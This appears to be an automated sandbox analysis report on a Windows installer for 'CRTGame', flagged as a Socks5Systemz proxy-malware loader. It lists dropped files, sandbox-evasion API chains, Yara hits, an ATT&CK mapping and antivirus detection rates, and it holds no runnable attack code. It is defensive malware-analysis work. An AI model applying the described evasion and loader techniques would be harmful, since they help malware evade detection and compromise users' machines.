Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GSP1P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-3DBAJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1CHIA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GRQ3N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MJ59N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-O5QKP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-VP35T.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NJ7JN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FBHLC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GUEH6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ITM21.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-B8HMN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-BA6TO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UG8V7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6JHM7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-83310.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-JMEV2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C9QMS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DMP2Q.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OMKRE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-63DO2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GKK7D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-EI0VO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1KFVE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-D14K1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PBK8V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-EI90O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-04UN3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OGODD.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_0-5689

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_6-15805

Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6636	Thread sleep count: 765 > 30	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6636	Thread sleep time: -1530000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6900	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6636	Thread sleep count: 9194 > 30	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6636	Thread sleep time: -18388000s >= -30000s	Jump to behavior

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004520C0 FindFirstFileA,GetLastError,	1_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,	1_2_00473F08
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_00496568
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463404
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463880
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,	1_2_00461E78

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe

Code function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

0_2_00409B30

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: crtgame.exe, 00000006.00000002.2944456684.0000000000997000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: crtgame.exe, 00000006.00000002.2945587982.00000000036F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	API call chain: ExitProcess graph end node	graph_0-6729
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	API call chain: ExitProcess graph end node	graph_4-2128
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	API call chain: ExitProcess graph end node	graph_4-2135
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	API call chain: ExitProcess graph end node	graph_6-15807

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 6_2_02C3FBDE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

6_2_02C3FBDE

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

6_2_02C3FBDE

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,

1_2_0044C030

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 6_2_02C25F2A RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,GetTickCount,wsprintfA,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,

6_2_02C25F2A

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 6_2_02C38F48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_02C38F48

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

1_2_00476FAC

Source: C:\Windows\SysWOW64\net.exe

Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

1_2_0042DFC4

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 6_2_02C37A8D cpuid

6_2_02C37A8D

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: GetLocaleInfoA,	0_2_004051FC
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: GetLocaleInfoA,	0_2_00405248
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: GetLocaleInfoA,	1_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: GetLocaleInfoA,	1_2_004085BC

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

1_2_00457CE8

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe

Code function: 0_2_004026C4 GetSystemTime,

0_2_004026C4

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_00454AB8 GetUserNameA,

1_2_00454AB8

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe

Code function: 0_2_00405CE4 GetVersionExA,

0_2_00405CE4

Stealing of Sensitive Information

Yara detected Petite Virus

Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944967183.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crtgame.exe PID: 5824, type: MEMORYSTR

Remote Access Functionality

Yara detected Petite Virus

Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944967183.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crtgame.exe PID: 5824, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	4 Windows Service	1 DLL Side-Loading	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Scheduled Task/Job	1 Access Token Manipulation	23 Software Packing	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Bootkit	4 Windows Service	1 DLL Side-Loading	NTDS	35 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 Masquerading	LSA Secrets	41 Security Software Discovery	SSH	Keylogging	112 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	3 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Bootkit	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Mg5bMQ2lWi.exe	55%	ReversingLabs	Win32.PUA.ICLoader
Mg5bMQ2lWi.exe	100%	Avira	HEUR/AGEN.1332570

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)	3%	ReversingLabs
